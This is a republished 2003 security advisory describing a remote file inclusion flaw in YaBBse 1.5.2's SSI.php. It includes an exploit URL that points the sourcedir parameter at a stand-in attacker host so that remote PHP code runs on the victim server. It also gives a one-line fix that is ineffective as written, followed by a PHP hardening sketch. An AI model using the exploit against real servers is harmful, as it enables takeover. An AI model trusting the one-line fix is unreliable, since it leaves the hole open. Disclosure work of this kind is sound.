
II-Labs IIL-13: YaBBse remote code execution

by Nikola Strahija on May 10th, 2003

A vulnerability that allows remote code execution has been discovered in YaBBse. A similar vulnerability was discovered in YaBB 1.5.1.


[ Illegal Instruction Labs Advisory ]
[------------------------------------------------------------------------]
Advisory name: Remote code execution in YaBBse 1.5.2 (php version)
Advisory number: 13
Application: Yet another Bulletin Board 1.5.2
Vendor: www.yabbse.org
Date: 06.05.2003
Impact: Attacker can execute arbitrary php code
Tested on: *
Discovered by: Dalibor Karlovic & DownBload
Mail me @: [email protected]
Homepage: www.kamikaza.org



======[ Overview
YaBB is a widely used bulletin board system.



======[ Problem
One of the files included in the main application is vulnerable to
remote code execution if it is accessed directly with certain
parameters.
The file in question is SSI.php.
A similar bug was discovered in the previous version, YaBB 1.5.1.

SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------

The $sourcedir variable can be defined through the URL, so some other
PHP script, local or remote, gets included (remote inclusion only works if it
is enabled in php.ini).
The bug is not exploitable if PHP's register_globals is set to off.




======[ Exploit

The exploit would look like this:
----cut here----
http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com
----cut here----

The attacker would place an Errors.php file on his server; the code it
contains would then be executed on the victim's server.
The attacker's httpd server must not have PHP enabled, because otherwise
the script would be parsed before being sent to the victim.




======[ Solution

Add this line before the include_once() lines mentioned above.

----cut here----
if (!isset($sourcedir)) $sourcedir = "";
----cut here----
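As an added hardening sketch for the top of SSI.php (this is not YaBBse's own code, and the location of the Sources directory is an assumption), the following assigns $sourcedir unconditionally from the install path after any request-derived globals have been populated, so a value supplied as ?sourcedir=... is overwritten regardless of the register_globals setting; it additionally refuses anything that names a URL wrapper or resolves outside the board's own directory tree.

```php
<?php
// Added example, not part of YaBBse. Assumption: the board's Sources
// directory lives next to SSI.php; adjust $base_dir if it does not.
$base_dir = dirname(__FILE__);

// 1. Assign $sourcedir from a trusted, fixed location. Doing this as a plain
//    assignment (not inside an isset() check) means a ?sourcedir=... query
//    string injected by register_globals is simply overwritten.
$sourcedir = $base_dir . '/Sources';

// 2. Defence in depth: verify the directory before it is used in include_once().
function safe_source_dir($dir, $base)
{
    // Reject anything with a URL scheme (http://, ftp://, php://, data: ...),
    // which is exactly what a remote-inclusion attempt looks like.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $dir)) {
        return false;
    }
    $real      = realpath($dir);
    $real_base = realpath($base);
    if ($real === false || $real_base === false) {
        return false;   // directory does not exist on the local filesystem
    }
    // Require the resolved path to sit inside the board's own tree, which also
    // stops ../ traversal to some other local file.
    $real      = rtrim($real, '/') . '/';
    $real_base = rtrim($real_base, '/') . '/';
    if (strpos($real, $real_base) !== 0) {
        return false;
    }
    return rtrim($real, '/');
}

$sourcedir = safe_source_dir($sourcedir, $base_dir);
if ($sourcedir === false) {
    // Fail closed rather than falling through to the include_once() calls.
    die('SSI.php: refusing to include sources from an untrusted location.');
}

include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
```

The scheme check is the part that directly addresses this advisory; the realpath() containment check covers the local-inclusion variant the advisory also mentions.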




======[ Greetz
Greetz goes to #hr.hackers and #linux .
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis,
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.
Shitz goes to stupid darkman, who will exploit this bug and claim that
he is a great hacker.

